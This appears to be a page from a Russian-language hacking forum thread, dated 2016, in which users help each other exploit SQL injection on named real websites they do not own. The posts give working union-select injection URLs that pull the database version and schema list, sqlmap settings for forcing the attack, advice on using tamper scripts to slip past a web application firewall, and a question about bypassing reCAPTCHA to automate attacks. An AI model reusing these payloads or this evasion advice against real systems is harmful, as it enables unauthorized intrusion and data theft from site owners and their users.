HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1321  
Старый 02.09.2016, 15:22
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от pw0ned  
pw0ned said:

WAF блочит если я не ошибаюсь. Крути руками
Ошибаешься waf не причём

+ логично если хав обошёл мамп тем более сможет обойти
 
Ответить с цитированием

  #1322  
Старый 02.09.2016, 15:24
demafly76
Guest
Сообщений: n/a
Провел на форуме:
6685

Репутация: 0
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

Ребят помогите раскрутить
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1'+union+select+version(),2+--+
 
Ответить с цитированием

  #1323  
Старый 02.09.2016, 15:31
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Ошибаешься waf не причём
+ логично если хав обошёл мамп тем более сможет обойти
Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
 
Ответить с цитированием

  #1324  
Старый 02.09.2016, 15:37
demafly76
Guest
Сообщений: n/a
Провел на форуме:
6685

Репутация: 0
По умолчанию

Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=-1'+union+select+schema_name,2+/*!From*/+information_schema.schemata+--+sp
В ссылках вывод
 
Ответить с цитированием

  #1325  
Старый 02.09.2016, 15:54
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от pw0ned  
pw0ned said:

Ты сам в мап уязвимость пихал ? Говорю ваф блочит, ты не слушаешь
Сувал но по логам нет не чего на счёт ваф у меня норм проходит

ваф меня пропускает
 
Ответить с цитированием

  #1326  
Старый 02.09.2016, 15:57
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

Сувал но по логам нет не чего на счёт ваф у меня норм проходит
ваф меня пропускает
ну-ка заскринь
 
Ответить с цитированием

  #1327  
Старый 02.09.2016, 15:58
r1l
Guest
Сообщений: n/a
Провел на форуме:
4609

Репутация: 0
По умолчанию

все ребят, отбой раскрутил, ахаха, но всеравно спасибо)
 
Ответить с цитированием

  #1328  
Старый 02.09.2016, 16:02
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

Ребят помогите раскрутить
Код:
Code:
http://trafficswirl.com/teamsplash.php?tid=1%27
Ни как мне эта скуля не дается((
с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
Можно попробовать обойти ваф набором тамперов.

https://github.com/sqlmapproject/sqlmap/tree/master/waf
 
Ответить с цитированием

  #1329  
Старый 02.09.2016, 20:52
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Часто стал натыкаться на сайтах на "Защиту от роботов" в основном рекапча

её как то можно обойти?

Даже если через сторонний сервис чекать, то как автоматизировать с тем же к примеру sqlmap
 
Ответить с цитированием

  #1330  
Старый 02.09.2016, 22:40
r1l
Guest
Сообщений: n/a
Провел на форуме:
4609

Репутация: 0
По умолчанию

Кручу уязвимость:

Код:
Code:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new
раскручиваю через --dbms=MySQL --risk=3

но чет какая то лажа выходит(



реально ли такое раскрутить?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ